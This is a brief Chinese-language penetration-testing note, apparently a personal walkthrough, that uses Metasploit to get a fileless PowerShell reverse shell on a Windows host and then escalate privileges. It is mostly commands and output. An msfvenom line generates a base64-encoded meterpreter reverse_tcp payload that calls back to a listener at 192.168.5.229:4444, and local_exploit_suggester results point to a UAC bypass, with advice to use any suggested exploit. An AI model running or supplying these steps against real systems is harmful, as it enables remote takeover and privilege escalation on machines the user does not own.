#无文件 #PowerShell #反向木马 #ReverseShell #Metasploit #Windows #powershell #reverse #tcp #Meterpreter #渗透测试

msf6 > use exploit/multi/handler
msf6 > set payload windows/shell_reverse_tcp

> msfvenom -p windows/shell_reverse_tcp LHOST=192.168.5.229 LPORT=4444 -e cmd/powershell_base64 -f psh-cmd > reverse.ps1
1. 开启监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
2. 生成powershell command命令
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.229 LPORT=4444 -e cmd/powershell_base64 -f psh-cmd > reverse.ps1
3. 提权
meterpreter > getsystem #拿不到权限
meterpreter > bg

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.5.233 - Collecting local exploits for x86/windows...
[*] 192.168.5.233 - 196 exploit checks are being tried...
[+] 192.168.5.233 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
……

扫出可以提权的exploit，随便使用一个提权